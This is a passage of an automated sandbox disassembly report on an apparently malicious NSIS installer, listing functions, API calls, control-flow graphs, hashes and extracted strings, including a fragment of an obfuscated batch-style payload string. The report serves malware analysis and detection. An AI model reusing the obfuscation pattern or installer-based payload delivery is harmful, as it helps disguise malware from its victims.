                                                                                        • API String ID: 608394941-1650083594
                                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,MountainDecision,MountainDecision,00000000,00000000,MountainDecision,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$MountainDecision
                                                                                        • API String ID: 4286501637-5759938
                                                                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                        Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 004035D7
                                                                                        • soft, xrefs: 00403675
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                        • Null, xrefs: 0040367E
                                                                                        • Inst, xrefs: 0040366C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                        • API String ID: 4283519449-527102705
                                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                        Strings
                                                                                        • Set Illustrated=MRmAInclusion Www Tours Ev vTYECoastal Poker Hack Home Daughter Growth yIHRim Shoes Naughty Cove Shark Neural Buf EqChemicals Burner Jessica akNested Motorcycle Dome Mariah Qui Terrorist ytAssumes Summit QTJJExcerpt Blank Set Ar, xrefs: 004033A9
                                                                                        • X1C, xrefs: 0040343C
                                                                                        • ... %d%%, xrefs: 0040349E
                                                                                        • X1C, xrefs: 004033ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                        • String ID: ... %d%%$Set Illustrated=MRmAInclusion Www Tours Ev vTYECoastal Poker Hack Home Daughter Growth yIHRim Shoes Naughty Cove Shark Neural Buf EqChemicals Burner Jessica akNested Motorcycle Dome Mariah Qui Terrorist ytAssumes Summit QTJJExcerpt Blank Set Ar$X1C$X1C
                                                                                        • API String ID: 651206458-3597238433
                                                                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GlobalFree.KERNELBASE(00581AD8), ref: 00402387
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeGloballstrcpyn
                                                                                        • String ID: Exch: stack < %d elements$MountainDecision$Pop: stack empty
                                                                                        • API String ID: 1459762280-3482557109
                                                                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • GlobalFree.KERNELBASE(00581AD8), ref: 00402387
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3376005127-0
                                                                                        • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                        • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2568930968-0
                                                                                        • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                        • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                        • String ID: <RM>$MountainDecision$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                        • API String ID: 247603264-1989267352
                                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                                        APIs
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,00000000), ref: 00402202
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                        • API String ID: 3156913733-2180253247
                                                                                        • Opcode ID: 5eccbf476ddb8d8674987fe8ecfee4b51fb34cd29abaac0676283de9dc4e119a
                                                                                        • Instruction ID: f55d60da09602e729bbbaeb293de983d941832755293fd791e3a9c0dc2eb8546
                                                                                        • Opcode Fuzzy Hash: 5eccbf476ddb8d8674987fe8ecfee4b51fb34cd29abaac0676283de9dc4e119a
                                                                                        • Instruction Fuzzy Hash: 3B01A7B2B4021476D720B6B69C87F7B2A5CDB41764F20447BF542F50D3E5BD89409179
                                                                                        Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
